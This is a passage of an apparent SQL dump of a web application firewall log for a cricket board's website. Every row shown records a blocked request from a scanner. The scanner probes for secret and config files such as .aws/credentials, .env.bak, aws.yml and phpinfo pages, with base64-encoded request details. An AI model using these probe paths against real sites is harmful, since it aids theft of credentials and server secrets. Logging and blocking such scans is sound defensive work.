Y2tldGJvYXJkLm9yZy51awoK\"}'),(860,1629844456.265977,1629844456.186000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(861,1629844455.017037,1629844454.916300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(862,1629844453.389684,1629844453.307900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHd3dy55b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(863,1629844452.056236,1629844451.960000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9waHBpbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(864,1629844450.370724,1629844450.281800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.yorkshirecricketboard.org.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9fcHJvZmlsZXIvcGhwaW5mbyBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB3d3cueW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(865,1629961374.171705,1629961374.094900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcuanMgSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(866,1629961372.985486,1629961372.910200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(867,1629961371.787771,1629961371.711300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9jb25maWcvYXdzLnltbCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(868,1629961370.656497,1629961370.575900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8gSFRUUC8xLjEKVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOSxmcjtxPTAuOApVc2VyLUFnZW50OiBNb3psaWxhLzUuMCAoTGludXg7IEFuZHJvaWQgNy4wOyBTTS1HODkyQSBCdWxpZC9OUkQ5ME07IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvNjAuMC4zMTEyLjEwNyBNb2JsaWUgU2FmYXJpLzUzNy4zNgpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogeW9ya3NoaXJlY3JpY2tldGJvYXJkLm9yZy51awoK\"}'),(869,1629961369.461291,1629961369.345300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uYXdzL2NyZWRlbnRpYWxzIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(870,1629961367.930460,1629961367.847800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pbmZvLnBocCBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(871,1629961366.396822,1629961366.283000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC8uZW52LmJhayBIVFRQLzEuMQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MApBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LGZyO3E9MC44ClVzZXItQWdlbnQ6IE1vemxpbGEvNS4wIChMaW51eDsgQW5kcm9pZCA3LjA7IFNNLUc4OTJBIEJ1bGlkL05SRDkwTTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS82MC4wLjMxMTIuMTA3IE1vYmxpZSBTYWZhcmkvNTM3LjM2CkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOApBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiB5b3Jrc2hpcmVjcmlja2V0Ym9hcmQub3JnLnVrCgo=\"}'),(872,1629961365.192151,1629961365.115500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1,\"fullRequest\":\"R0VUIC9hd3MueW1sIEhUVFAvMS4xClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDEKQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0wCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksZnI7cT0wLjgKVXNlci1BZ2VudDogTW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzYKQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44CkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IHlvcmtzaGlyZWNyaWNrZXRib2FyZC5vcmcudWsKCg==\"}'),(873,1629961363.975589,1629961363.897600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://yorkshirecricketboard.org.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) 